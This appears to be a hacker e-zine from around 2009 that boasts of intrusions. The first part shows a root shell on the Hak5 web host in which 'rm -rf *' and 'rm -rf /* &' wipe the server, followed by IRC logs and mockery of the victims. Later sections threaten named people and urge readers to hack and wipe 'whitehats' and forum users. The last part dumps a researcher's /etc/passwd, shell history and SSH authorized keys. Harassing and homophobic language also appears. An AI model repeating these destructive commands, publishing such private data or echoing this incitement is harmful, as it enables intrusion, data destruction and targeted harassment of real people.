drwxr-x---  2 hak5   hak5	 4096 Feb  7  2008 conf/
-rw-------  1 hak5   hak5	    0 Feb 22  2008 .contactemail
drwx------  5 hak5   hak5	 4096 Feb 24  2008 .cpanel/
drwxr-xr-x  4 hak5   hak5	 4096 Nov 29  2008 cpanel3-skel/
-rw-r-----  1 hak5   hak5	    1 Jun  8 11:48 cpbackup-exclude.conf
drwxr-xr-x  3 hak5   hak5	 4096 Jul 21  2008 cpmove.psql/
drwxr-xr-x  2 hak5   hak5	 4096 Feb 22  2008 cpmove.psql.1216697313/
-rw-r--r--  1 hak5   hak5	    8 May  1 19:27 .dns
-rw-r--r--  1 hak5   hak5	  383 Feb 22  2008 .emacs
drwxr-xr-x  2 hak5   hak5	 4096 Feb 22  2008 error_docs/
drwxr-x---  3 hak5   mail	 4096 Aug 19  2008 etc/
-rw-------  1 hak5   hak5	   17 Jun 24 03:14 .ftpquota
-rw-r--r--  1 hak5   hak5   146463861 Jul 22  2008 hak5_hak5wiki.sql
-rwxrwxrwx  1 hak5   hak5	   19 Apr 23  2007 .htpasswd*
drwxr-x---  2 hak5   nobody	 4096 Jul 21  2008 .htpasswds/
-rw-r--r--  1 hak5   hak5	 5389 Jun  1  2007 httpd.config.old
drwxr-x---  7 hak5   hak5	 4096 Apr 25  2007 httpsdocs/
-rw-r--r--  1 hak5   hak5	    7 Jul 21  2008 .lang
-rw-------  1 hak5   hak5	   14 Jul  2 21:26 .lastlogin
-rw-------  1 hak5   hak5	   35 Feb 24 18:23 .lesshst
drwxrwx---  6 hak5   hak5	 4096 Jul 19 16:15 mail/
drwxr-xr-x  4 hak5   hak5	 4096 Jul 21  2008 .mozilla/
drwxr-x---  2 hak5   hak5	 4096 Apr 23  2007 pd/
drwx------  2 hak5   hak5	 4096 Dec 22  2007 private/
drwxr-x---  5 hak5   hak5	 4096 Aug 20  2008 public_ftp/
drwxr-xr-x 64 hak5   nobody	 4096 Jul 19 17:39 public_html/
drwxr-xr-x  3 hak5   hak5	 4096 Aug 20  2008 rev3/
-rw-r--r--  1 hak5   hak5    31233829 Sep  6  2008 sbbs.rar
dr-xr-x---  7 hak5   hak5	 4096 Apr 22  2007 statistics/
drwxr-xr-x  5 hak5   hak5	 4096 Mar 19  2008 subdomains/
-rw-r--r--  1 hak5   hak5	50886 Mar  4  2008 test
drwxrwxrwt 34 hak5   hak5	 4096 Mar 16 00:14 tmp/
drwx------  2 hak5   hak5	 4096 May 15  2008 .trash/
drwxr-xr-x  3 hak5   hak5	 4096 Dec 21  2007 usr/
drwxr-xr-x  2 hak5   hak5	 4096 Apr 22  2007 web_users/
lrwxrwxrwx  1 hak5   hak5	   11 Jul 22  2008 www -> public_html/
-rw-r--r--  1 hak5   hak5	  658 Feb 22  2008 .zshrc
drwxrwxrwx 25 nobody nobody	 4096 Jun 24 14:51 zz/
root@web02 [/home/hak5]# cd public_html
root@web02 [/home/hak5/public_html]# ls -al
total 104412
drwxr-xr-x  2 hak5 hak5       4096 Dec 22  2007 ~/
drwxr-xr-x 64 hak5 nobody     4096 Jul 19 17:39 ./
drwx--x--x 25 hak5 hak5       4096 Jul	2 21:26 ../
-rw-r-xr-x  1 hak5 hak5 	19 May	5 14:43 1nfo.php*
drwxr-xr-x  2 hak5 hak5       4096 May 18  2007 2x01s1/
-rw-r-xr-x  1 hak5 hak5       1010 Apr 22  2007 400.shtml*
-rw-r-xr-x  1 hak5 hak5        953 Apr 22  2007 403.shtml*
-rw-r-xr-x  1 hak5 hak5        954 Apr 22  2007 404.shtml*
drwxr-xr-x  2 hak5 hak5       4096 Jan 11  2009 421/
-rw-r-xr-x  1 hak5 hak5       1256 Apr 22  2007 500.shtml*
drwxr-xr-x  4 hak5 hak5       4096 Aug 16  2007 aardwolf/
drwxr-xr-x  6 hak5 hak5       4096 Mar 29 14:46 ~aardwolf/
drwxr-xr-x  3 hak5 hak5       4096 Nov 26  2008 ads/
drwxr-xr-x  3 hak5 hak5       4096 Jul	2  2008 aping/
drwxr-xr-x  2 hak5 hak5       4096 Feb 16 18:20 broken-flash-player/
drwxr-xr-x  3 hak5 hak5       4096 Feb 22  2008 cgi-bin/
drwxr-xr-x  4 hak5 hak5       4096 Apr 28 00:52 chat/
drwxr-xr-x  2 hak5 hak5       4096 Aug 27  2007 comic/
-rw-r-xr-x  1 hak5 hak5        219 Feb 14  2008 crossdomain.xml*
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 css/
drwxr-xr-x  2 hak5 hak5       4096 Jul 28  2008 darren/
-rw-r-xr-x  1 hak5 hak5     434127 Apr	3  2008 digsby.jpg*
drwxr-xr-x  7 hak5 hak5       4096 Jan 17  2008 docuwiki/
drwxr-xr-x  3 hak5 hak5       4096 May	4  2007 e/
-rw-r-xr-x  1 hak5 hak5 	 7 Apr 29 09:51 eggs.txt*
drwxr-xr-x  2 hak5 hak5       4096 Apr 26 15:33 episodes/
drwxr-xr-x  2 hak5 hak5       4096 Jan	9  2008 eps/
drwxr-xr-x  2 hak5 hak5       4096 Dec	2  2008 evilserver/
-rw-r-xr-x  1 hak5 hak5       6894 Apr 23  2007 favicon.ico*
drwxr-xr-x  2 hak5 hak5       4096 Apr 15 11:24 files/
-rw-r-xr-x  1 hak5 hak5     132711 Feb 14  2006 FlashIRCChat.swf*
drwxr-xr-x  2 hak5 hak5       4096 Sep	9  2008 fon/
drwxr-xr-x 22 hak5 hak5       4096 Jun 28 19:51 forums/
drwxr-xr-x 20 hak5 hak5       4096 Oct	6  2008 forums_backup/
-rw-r-xr-x  1 hak5 hak5   96263988 Apr 22 16:35
Hak5--all-themes-and-bumpers.zip*
-rw-r-xr-x  1 hak5 hak5     116237 Aug 15  2008 hak5black.jpg*
-rw-r-xr-x  1 hak5 hak5      58410 Sep 10  2008 hak5--stickers2.jpg*
drwxr-xr-x  2 hak5 hak5       4096 Nov 19  2008 HakHouseCamSetup/
-rw-r-xr-x  1 hak5 hak5        864 Oct	8  2007 hitachi.html*
-rw-r-xr-x  1 hak5 hak5       1859 Jul 19 17:39 .htaccess*
drwxr-xr-x 29 hak5 hak5      12288 Jul	4 09:21 images/
drwxr-xr-x  5 hak5 hak5       4096 Jul 13  2006 img/
-rw-r-xr-x  1 hak5 hak5        347 Apr	1  2008 index.html.aprilfools*
-rw-r-xr-x  1 hak5 hak5        149 Apr 22  2007 index.html.bak*
-rw-r-xr-x  1 hak5 hak5        397 Jun 20 10:49 index.php*
-rw-r-xr-x  1 hak5 hak5 	21 Feb 22  2008 info.php*
-rw-r-xr-x  1 hak5 hak5      13806 Feb 13  2008 IrcClient.swf*
drwxr-xr-x  2 hak5 hak5       4096 Sep 21  2007 jangl/
drwxr-xr-x  2 hak5 hak5       4096 May 11 20:29 js/
-rw-r-xr-x  1 hak5 hak5     121177 Jan 19  2004 kerberos.jpg*
-rw-r-xr-x  1 hak5 hak5      54401 Apr 22  2007 kerby503.jpg*
drwxr-xr-x  2 hak5 hak5       4096 May	5  2007 lanparty/
-rw-r-xr-x  1 hak5 hak5      15410 Jun 20 10:49 license.txt*
drwxr-xr-x  4 hak5 hak5       4096 Jun	4  2007 live00/
-rw-r-xr-x  1 hak5 hak5     373983 Apr	6  2008 logo.psd*
-rw-r-xr-x  1 hak5 hak5    1140360 Sep 27  2008 lp.exe*
-rw-r-xr-x  1 hak5 hak5     296996 Jul	1  2008 mediakit.pdf*
-rw-r-xr-x  1 hak5 hak5      11730 Apr	1  2008 monkey.gif*
-rw-r-xr-x  1 hak5 hak5      47175 Apr	1  2008 monkey.jpg*
drwxr-xr-x  2 hak5 hak5       4096 Aug 26  2007 music/
drwxr-xr-x  2 hak5 hak5       4096 Sep	6  2007 noob/
drwxr-xr-x  3 hak5 hak5       4096 Apr 13  2008 nooblube/
drwxr-xr-x  2 hak5 hak5       4096 Mar 31  2008 omniotaku/
-rw-r-xr-x  1 hak5 hak5     104756 Mar 31  2008 omniotaku.jpg*
drwxr-xr-x  3 hak5 hak5       4096 May	7  2007 packages/
-rw-r-xr-x  1 hak5 hak5        455 Jun 28 19:47 php.ini*
drwxr-xr-x  7 hak5 hak5       4096 Jun 26 19:01 phpMyBackupPro/
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 picture_library/
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 plesk-stat/
drwxr-xr-x  2 hak5 hak5       4096 May	5  2007 poll/
drwxr-xr-x  2 hak5 hak5       4096 May	5  2007 polls/
drwxr-xr-x  2 hak5 hak5       4096 Mar 20 16:21 promo/
-rw-r-xr-x  1 hak5 hak5       7638 Jun 20 10:49 readme.html*
-rw-r--r--  1 hak5 hak5        106 Jun 30 23:29 realdarren.txt
drwxr-xr-x  6 hak5 hak5       4096 Jul 11  2008 releases/
drwxr-xr-x  2 hak5 hak5       4096 May 18  2007 remote/
drwxr-xr-x  2 hak5 hak5       4096 Mar	6 10:25 reserved/
drwxr-xr-x  3 hak5 hak5       4096 Feb 20 00:31 rss/
-rw-r-xr-x  1 hak5 hak5       1202 Apr 29 09:56 rtt.php*
drwxr-xr-x  2 hak5 hak5       4096 May 18  2007 rules/
-rw-r-xr-x  1 hak5 hak5       1712 Dec 29  2008 segment.php*
drwxr-xr-x  2 hak5 hak5       4096 Aug	2  2008 setcam/
drwxr-xr-x 17 hak5 hak5       4096 Jul	2 17:09 shop/
drwxrwxrwx  2 hak5 hak5       4096 Jul	1 14:47 shopp/
drwxr-xr-x  2 hak5 hak5       4096 Sep 26  2008 somethingnew/
drwxr-xr-x 12 hak5 hak5       4096 May	5 16:12 store_2/
drwxr-xr-x 13 hak5 hak5       4096 Jul	2 21:39 store_3/
drwxr-xr-x  2 hak5 hak5       4096 Apr 22  2007 stream/
-rw-r-xr-x  1 hak5 hak5        715 Aug 14  2007 stream.html*
drwxr-xr-x  2 hak5 hak5       4096 Dec 21  2007 stuff/
drwxr-xr-x  2 hak5 hak5       4096 Feb 23  2008 suspended.page/
-rw-r-xr-x  1 hak5 hak5    6817944 Oct 31  2008 telcobobs-stereo.mp4*
drwxr-xr-x  9 hak5 hak5       4096 Jul 13 12:28 temp/
drwxr-xr-x  9 hak5 hak5       4096 Apr 22  2007 test/
-rw-r-xr-x  1 hak5 hak5        830 Dec 12  2008 trivia.php*
-rw-r-xr-x  1 hak5 hak5     100987 Jul	1 12:01 twin.html*
drwxr-xr-x  3 hak5 hak5       4096 Jun 10 10:49 w/
drwxr-xr-x  7 hak5 hak5       4096 Jun 20 10:50 wp-admin/
-rw-r-xr-x  1 hak5 hak5      40543 Jun 20 10:49 wp-app.php*
-rw-r-xr-x  1 hak5 hak5        220 Jun 20 10:49 wp-atom.php*
drwxr-xr-x  2 hak5 hak5       4096 Feb 24 18:03 wpau-backup/
-rw-r-xr-x  1 hak5 hak5        274 Jun 20 10:49 wp-blog-header.php*
-rw-r-xr-x  1 hak5 hak5       3649 Jun 20 10:49 wp-comments-post.php*
-rw-r-xr-x  1 hak5 hak5        238 Jun 20 10:49 wp-commentsrss2.php*
-rw-r-xr-x  1 hak5 hak5        910 Feb 22  2008 wp-config.php*
-rw-r-xr-x  1 hak5 hak5       2626 Jun 20 10:49 wp-config-sample.php*
drwxr-xr-x 13 hak5 hak5       4096 Jul	2 22:40 wp-content/
-rw-r-xr-x  1 hak5 hak5       1254 Jun 20 10:49 wp-cron.php*
-rw-r-xr-x  1 hak5 hak5        220 Jun 20 10:49 wp-feed.php*
drwxr-xr-x  6 hak5 hak5       4096 Jun 20 10:49 wp-includes/
-rw-r-xr-x  1 hak5 hak5       1946 Jun 20 10:49 wp-links-opml.php*
-rw-r-xr-x  1 hak5 hak5       2341 Jun 20 10:49 wp-load.php*
-rw-r-xr-x  1 hak5 hak5      21019 Jun 20 10:49 wp-login.php*
-rw-r-xr-x  1 hak5 hak5       7113 Jun 20 10:49 wp-mail.php*
-rw-r-xr-x  1 hak5 hak5        487 Jun 20 10:49 wp-pass.php*
-rw-r-xr-x  1 hak5 hak5        218 Jun 20 10:49 wp-rdf.php*
-rw-r-xr-x  1 hak5 hak5        316 Jun 20 10:49 wp-register.php*
-rw-r-xr-x  1 hak5 hak5        220 Jun 20 10:49 wp-rss2.php*
-rw-r-xr-x  1 hak5 hak5        218 Jun 20 10:49 wp-rss.php*
-rw-r-xr-x  1 hak5 hak5      21213 Jun 20 10:49 wp-settings.php*
-rw-r-xr-x  1 hak5 hak5       3434 Jun 20 10:49 wp-trackback.php*
-rw-r-xr-x  1 hak5 hak5      92144 Jun 20 10:49 xmlrpc.php*
drwxr-xr-x 11 hak5 hak5       4096 Mar	3  2008 yshout/
root@web02 [/home/hak5/public_html]# rm -rf *
root@web02 [/home/hak5/public_html]# nano index.html
root@web02 [/home/hak5/public_html]# rm -rf /* &

We could have put a lot more effort into Hak5, but let's face it: they just
don't register, they are not hackers. I think they are lesser hackers than cDc.
Mubix is their inhouse security expert, he even knows how to use Dan Kam's code
and tunnel over DNS! But he reused an all lower-case-alpha password on his
LIFE. These guys are just too easy. Hak5: Don't come back soon and have a great
time interviewing s/hackers/other wannabes/ at defcon :).

One other thing, If that broad you have working on your show offers to take a
shower of spunk from ZF0 at defcon, we might be tempted to not rm you again.
Bear it in mind.


IRC logs are funny.

04:36 < prdelka> root@web02 [/home/hak5/public_html]# rm -rf *
04:36 < prdelka> root@web02 [/home/hak5/public_html]#
04:36 < prdelka> root@web02 [/home/hak5/public_html]#
04:36 < prdelka> root@web02 [/home/hak5/public_html]# nano index.html
04:36 < prdelka> root@web02 [/home/hak5/public_html]# rm -rf /* &
04:36 < prdelka> [1] 1364
04:36 -!- mode/#hak5 [+b *!*@mintirc-f46f3932.us] by SpamServ

04:39 < sh33p> The one thing that will get people talking is a ban
04:40 <+Shn> I think the thing that got them talking is the hak5 site being hacked...
04:40 < Joeeigel> ^
04:40 < The_PHP_Jedi> Wow. It did get defaced.
04:40 < darkjedicoder> I thought that person was kidding
04:41 < The_PHP_Jedi> So was I.
04:41 < Screech_Rat> Nope. That was the real deal.

04:46 < Marfi> So I actually typed "fuqhak5" into google, and there is actually a 
group that writes exploits, and you can use them, as long as your not a fan of Hak5
04:47 <+KriLL3> Marfi: oh damn
04:47 < Marfi> http://milw0rm.com/exploits/8678
04:47 < Marfi> KriLL3: Notes at the bottom
04:47 < The_PHP_Jedi> Marfi, yeah, I noticed.
04:47 < The_PHP_Jedi> Boris, good point :P
04:47 < Oneill> someone doesnt like hak5 =X
04:47 < The_PHP_Jedi> Anyways, a defacement is a defacement. Who cares.
04:48 < The_PHP_Jedi> Let Revision3 sue the hell out of anyone if they want to.
04:48 < Marfi> The_PHP_Jedi: Yup. Just some bored 16 year olds

05:06 < balboa> What's wrong with the site :(
05:06 <@Bryan> :o check out the topic
05:06 -!- Benji [Benji@MintIRC-fba35796.tron-inter.net] has joined #hak5
05:06 < balboa> O
05:06 < Benji> hak5 is haksawd?
05:07 < balboa> ^^
05:07 < Joeeigel> Can you people not read the topic?
05:07 < balboa> Nope
05:07 < Benji> re-what?
05:07 < nish> hey whatsup with the site?
05:07 <@massiveH> Joeeigel, that is asking alot...
05:07 < Joeeigel> Next person to ask that is getting a ban..
05:07 < darkjedicoder> haha
05:07 < balboa> got rm'd
05:07 < nish> xD
05:08 <@Bryan> nish, read the topic
05:08 < balboa> by some haqr
05:08 < Timber> lolzzzzz
05:08 < uzi> what happened to the site
05:08 <@Bryan> ..
05:08 -!- mode/#hak5 [+b *!*@E60B39.2F35B6.4BF1DF.EEBFBB] by Bryan

06:55 -!- prdelka [400ml@MintIRC-cc39b182.net] has joined #hak5
06:55 < prdelka> did hak5.org just get hacked?
06:56 -!- sena [random@MintIRC-d15a1d16.pools.arcor-ip.net] has joined #hak5
06:57 < prdelka> guess so :)
06:57 < Benji> did prdelka get hacked?
06:57 < Benji> guess so :)
06:59 -!- prdelka [400ml@MintIRC-cc39b182.net] has quit [G-Lined: Security Threat detected]

07:07 -!- Manuel changed the topic of #hak5 to: Welcome to #hak5 | Rules read 'em!!!!: 
http://is.gd/6sjb | The_PHP_Jedi is awesome | http://tinyurl.com/mjdaqf | Hacksaw is taboo!!!! 
| http://wechoosethemoon.org/ | Yes,  hak5.org has been hacked and is ddossed by 
prdelka/shifted/Xodus/Chief, and most of us don't care :)
07:07 -!- Manuel changed the topic of #hak5 to: Welcome to #hak5 | Rules read 'em!!!!: 
http://is.gd/6sjb | The_PHP_Jedi is awesome | http://tinyurl.com/mjdaqf | Hacksaw is taboo!!!! 
| http://wechoosethemoon.org/ | Yes,  hak5.org has been hacked and is ddossed, and most of us 
don't care :)
07:09 <@VaKo> hacked? this is new
07:09 <@VaKo> I hope they took backups
07:10 <@Manuel> yeah

07:17 <@Manuel> well... ok, maybe not a ddos ... but either way, the entire hosting service is
offline... apparently securibit is down too, along with many other sites hosted by divergent networks

08:17 <+preciousRoy> VaKo: I've been looking at the 'sploit for this, Someone's account was 
compromised OR this guy had one on the server.
08:17 < Boris> more no disclosure
08:17 < The_PHP_Jedi> I'mnot even sure if Darren's aware... http://twitter.com/hak5darren
08:17 < The_PHP_Jedi> lol
08:18 <@Bryan> He probably knows
08:18 < The_PHP_Jedi> preciousRoy, but can we confirm that the server was exploited via one of his 
own exploits?
08:18 <+Shn> preciousRoy, that exploit doesn't have anything to do with the site being hacked
08:18 <@Manuel> no, but http://twitter.com/chrisgerling
08:18 <+Shn> or not as far as anyone knows
08:18 <@VaKo> i'm all for full disclousure, just only after its been fixed
08:18 < The_PHP_Jedi> Shn, exactly.

08:27 <@Bryan> it could have been magical lizard men who used their psychic powers to pull the root 
password from paul.
// I don't know how you know that, but please don't tell anyone else.

10:01 <%The_PHP_Jedi> "Hak5 was indeed hacked along with all 84 of the other sites on the server being
wiped, backups are a month old, rebuilding the server now"
10:02 <%The_PHP_Jedi> A month old. Geez.

10:06 < leechy> i bet he used tor, but thats traceable now

10:13 <%The_PHP_Jedi> leechy, for some reason he hates Hak.5, and that's it.
10:13 <+Shn> leechy, he hates hak5
10:13 < leechy> really dumb
10:13 <%The_PHP_Jedi> Welcome to the world of mysteriously motivated criminals.

10:39 < leechy> i know i'm not supposed to speak of the exploit, but did they remove all of matts 
websites? cause thats just a dick move. he could lose jobs over that
// Christ I hope so

11:24 <@The_PHP_Jedi> leechy, we're assuming DivergentNetworks will close down the security hole 
before putting their datacenter back online.
11:24 <@The_PHP_Jedi> or servers. Whatever they have.
// ....if they knew what they were?

// Did you guys see Hostgator say they had a patch in the works for the OpenSSH 0day? A patch for
// something they couldn't confirm exists or not? TALENT

11:44 <@The_PHP_Jedi> And yeah, the 1,000,000 penny question: How did they root the server?
11:44 <@The_PHP_Jedi> Assuming the hole's patched.
11:44 < Hak5Matt> that 2.6.29 kernel exploit apparently
11:44 < leechy> oh, don't get 2.6.30 either
11:44 < leechy> its got holes too
// Much like every other Linux kernel out there

23:59 < Timber> Wil they discuss hw the site got hacked in the nxt episode ?
23:59 <@Bryan> probably not

00:31 <@Manuel> the girlfriend thing is acting
00:31 < RichardR> just look at darren's flickr account
00:31 <@Manuel> he said he wants some dude that goes by the nick of "nish"
00:31 <@VaKo> whats wrong with being gay?
00:32 < Solid> its gay

Obviously these men are technological gods.

After the rm, we like how you guys made up a story about how you got hacked.
Was that computer generated?

"At approximately 3:30pm eastern time on Monday, the webserver that hosts Hak5 as well as 84 
other non Hak5 related sites was exploited by a cross site scripting attack which resulted in 
the dump of a mysql field that contained the root password for the server."

You write good fiction, have you ever thought of ghost-writing for Mitnick?


<prdelka> its a bit inconvienant that i said i wanted to rm them
<prdelka> and then they get rm'd
<prdelka> and defaced with my nick on the site
<prdelka> and an exploit with its own fuqHAK5 license
<prdelka> convientantly referenced on the site
<prdelka> i also am mentally ill so i have to keep telling myself i didnt d oit
<prdelka> heh

Is prdelka pulling a Tyler Durden and ZF0ing at night? ONLY WE KNOW.



                                           |
                                       \       /            _\/_
     CF0                                 .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
                                                                    |


We're gonna use this column to send some messages and provide some direction. 

First, DeadlyData of TheDefecated. You are the sloppiest hacker anywhere. We
watched you hack ioncube and then lose it immediately, because you ssh'd to
root from your home IP. Sad. We usually don't mind other hackers as long as
they are clean and keep to themselves. You're dirtier than the rotting cat
carcass I saw downtown. Please, for the love of God, take a year off. Go up to
the mountains and train under a Shaolin monk in the art of hax. Learn some
Linux. Just, stay out of our way or we will take a detour to shred your hard
drive.

mu-b of digit-labs.org. Hey dude we saw your private xnu exploit leaked to
milw0rm!!! By you!!! Really, when you sell to iDefense you have to remove the
"- Private Source Code -DO NOT DISTRIBUTE -" tag. That's just how it is. And
you're not allowed to ever use it again. You can't pretend to be a priv8 el8
haqer after selling to iDefense. It's not funny to have it on your old exploits
either. Could you just quit security? We would feel better.

Maybe it was owning Anonymous BS that got us a newer, dumber target audience.
We keep seeing complaints about the commands we use from the .bash_history
dumps. Morons, nothing in .bash_history is from us. It's us showing what the
legit user did on his shell. People that make mistakes like these lose their
internet privileges as far as I'm concerned. Just rm these people. rm their
posts, rm their forum accounts, rm their shells, drop their connections....just
do what you can to remind these people that the internet is not a nice place.
Blackcode got an rm for basically a couple posts we did not like. If you run a
forum, you are responsible for keeping your users in line. It's a team effort
here, let's clean this shit up. 

                     63a6d64e31bc22dd7d595ccf1f6d38e2
To someone (and...anyone) prepping to fuck us: Fuck you too. You will be
marked, you understand? We will go scarred earth across any box you've ever
touched, you'll never get off your loopback again. 
                     6ef48cf955add6af43a707c7b56e2071

This antisec chaos is a lot of fun to watch, but you really have to *target*
the security industry instead of just hitting whatever you can, like
imageshack, and defacing it with an antisec message. The theme is right but the
talent needs a bit of work. One observer criticized Anti-sec as "lame ass
quality of their drops, lame overhyping, obviosuly faked logs, contradicting 
manifesto and actions," so that's a starter list of what to work on to get
respect in the underground. Give it time. We call for you (and everyone else)
to 0wn some whitehats. See the big mailing list in our article on Dan Kaminsky?
Own some of those. Those are whitehats who think they run this. The survivors.
Valid targets. But beware: those with memories better than a goldfish will note
what we said about DeadlyData. If you hack these whitehats, watch them or rm
them, but do not make a huge mess and get busted quickly. If we lose access
because you stumbled on a box with the grace of a drunken hobo, we will not be
happy. The pr0j3kt lives, now go forth and school some whitehat bitches! 

This CF0 already has a winner, Matasano was preemptively owned! HELL YEAH.



                                           |
                                       \       /            _\/_
     cr0.org - Tinned Frenchman          .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     What will you do when your system fails?                       |
       We have made the present, obsolete
         What do you want? What do you need?
           We'll find a way when all hope is gone
             We've seen the fall of the elite



Julian Tinnes is a french (lol) security expert (lol) and works for Google. His
most noteable work until recently was probably the local turned remote kernel
bug in MadWIFI. Julian's past disclosure brought him to our attention, it just
so happens that he has recently disclosed yet more information (debatable how
much of it was his work). Julien has really had a good couple of years, with
some solid work, especially some good blog posts in the last few months.

This being said, we figured that Julian simply would not want to miss out on
being involved in our full disclosure party.

On with the show.

titiweb@flint:/$ uname -a
Linux flint 2.6.28.7-grsec-em64t #2 SMP Mon Feb 23 15:09:01 CET 2009 x86_64 
GNU/Linux
titiweb@flint:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
clamav:x:101:104::/var/lib/clamav:/bin/false
titiweb@flint:$ ls -la
total 88
drwx------  8 titiweb titiweb  8192 2009-06-10 17:17 .
drwx------  3 titiweb titiweb  8192 2009-07-11 14:50 ..
drwx------  2 titiweb titiweb  8192 2003-08-02 15:26 acidcorp
-rwx------  1 titiweb titiweb  1801 2009-05-20 10:24 .bash_history
drwx------  2 titiweb titiweb  8192 2008-04-01 18:44 cgi-bin
drwx------ 15 titiweb titiweb  8192 2009-05-20 00:17 cr0
drwx------  2 titiweb titiweb  8192 2004-10-21 18:01 .lftp
drwx------  2 titiweb titiweb  8192 2008-10-14 11:03 .ssh
-rwx------  1 titiweb titiweb	  0 2008-07-08 19:56 .subttlog
-rwx------  1 titiweb titiweb 13036 2009-05-20 00:17 .viminfo
drwx------  2 titiweb titiweb  8192 2009-06-10 17:06 www
titiweb@flint:$ cat .bash_history 
ls
ls
cd cr0/
ls
vim vulnerabilities.html 
ls
vim .ssh/authorized_keys 
ps aux
ls
cd www/
ls
ls
vim index.html 
cd
ls
cd cr0/
ls
vim index.html 
ls
rm gainsbourg.forever.tar 
ls
cd cr0/
ls
vim index.html 
ls
vim vulnerabilities.html 
vim vulnerabilities.html 
ls
cd cr0/
ls
mkdir getmyip
cd getmyip/
vim index.pgp
vim index.php
vim index.php 
cd..
cd ..
ls
mv getmyip/ ip
cd ip
ls
vim index.php 
cat ../index.html 
ls
vim index.php 
vim index.php 
cd cr0/
ls
cd ip/
ls
vim index.php 
vim index.php 
ls
find | grep -i securite
cd cr0/
vim index.html 
grep divers/securt *
grep divers/securit *
grep divers/securit */*
ls
cd progs/
ls
cd crctools/
ls
vim index.html 
vim index.html 
cd ..
cd ..
vim index.
vim index.html 
ls
cd www/
cd ..
cd cr0/
ls
vim index.
vim index.html 
vim index.html 
cd cr0/
ls
vim index.
vim index.html 
chmod 600 index.
chmod 600 about.html 
cat about.html 
vim index.html 
ls
vim www/
cd cr0/ls
cd cr0/
ls
vim index.html 
ls
cd cr0/
ls
cd progs/slipfest/
ls
vim index.html 
ls
cd cr0/ls
cd cr0/
ls
vim index.
vim index.html 
ls
cd www/
ls
cd
cd cr0/
ls
ls -rc
cat about.html 
ls -l
chmod o+r about.html 
chmod a+r about.html 
chmod g-r about.html 
chmod o-r about.html 
ls
cd www/
ls
cd ..
ls
cd cr0/
ls
vim index.html 
vim index.html 
cd cr0/
ls
vim index.
vim index.html 
ls
cd cr0/
ls
cd misc/
ls
wget 'http://guillot.iiens.net/softs/smile.rb'
ls -l
ls
ls acidcorp/
cat acidcorp/index.html 
ls
cd cr0/
ls
cat about.html 
vim about.html 
ls
cd cr0/
ls
cd pa
cd paper/
ls
ls
cd cr0/
ls
cd pu
ls
cd cr0
ls
cd bordel/
ls
wipe impotscertif1.p12 
shred impotscertif1.p12 
file im
file impotscertif1.p12 
rm impotscertif1.p12 
ls
ls
ls
cd cr0/
vim index.html 
ls -l
cp index.html index.html.bak
chmod 600 index.html.bak
vim index.html
cd cr0/misc/
ls
ls -l calendarpatch.patch 
titiweb@flint:$ ls -la .ssh/
total 32
drwx------ 2 titiweb titiweb 8192 2008-10-14 11:03 .
drwx------ 8 titiweb titiweb 8192 2009-06-10 17:17 ..
-rwx------ 1 titiweb titiweb 1193 2008-07-08 11:47 authorized_keys
-rwx------ 1 titiweb titiweb  239 2005-08-11 20:37 known_hosts
titiweb@flint:$ cat .ssh/*
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA3hFSiTBbjIgZUI5hb4huhzhtnJ5N+R2tac5I3xhtdzrwrnz/hb6
5YOMJpi6ZidYayb/GO12MoegHFYjM7ojOQurv6efrgw5eHa9hGA0g7niYlLWysikrGARA5jeNLouzYC
j86CeaLdItJmaZXrwuzWJX1S/+KcUc95QnDGnl+lmoM66h9zYhqvHzGw+6xv+URrF+9sDq0u6sNX1UA
Z3zdHNQYYiRsPNUUCZDensW8lZ6q3xk1W59gp8l5Xl0+SpHW1CuVSqXMiqwb2vd+C4YJE5VBvsz2Aq0
fxrrRbXzW/OqKm6TLWPua6JP0bOwqmyN7akiK3m3XBbAJLSpK2Ey/w== piaf@paradigm
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA2Jo1urZjj2YRqrxwKp+EV6H7/v9qBLbb9bCYo0OhvTd8fKuIJUH
TS/1HzV9YUW3BMHYpc3BaOYAqRLu3x32zK3p9j8WJCuNuRtin4kCYt3AZmfQLPSeN75jrNzZcggKyHI
7J7hLVDpMBfYHS8wfLPHbCYZ7FaZ8snJtL2MJ1Ck/bWRdVrr3a9xymAoHhFMLCFX5C962uVJhJGlGd3
a727N5NJ4yA3vKAhfbNWqS5sgd03kQ+GXXCWhqvw64yziVyEK5UaFyCjjZatySMscuLygugwsq3A7r8
EjlcfsytJeIKN3Uald6/zmlOXT8gmJihVOD8CEEp/o6MdAGnknjzfQ== julien@p-xplesnois
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAyQUi5aYuj5EGR0KkHQ3NckbaV6fh/yXcc+TGwuBP8m0YrsGT9ks
D485QRQlLdP7AUAYhkbfnoB0VcXy/JRG/c4uDpYXputidYzZlnSx5V7T9CdW+YfQnHBLNuM1YYACWzP
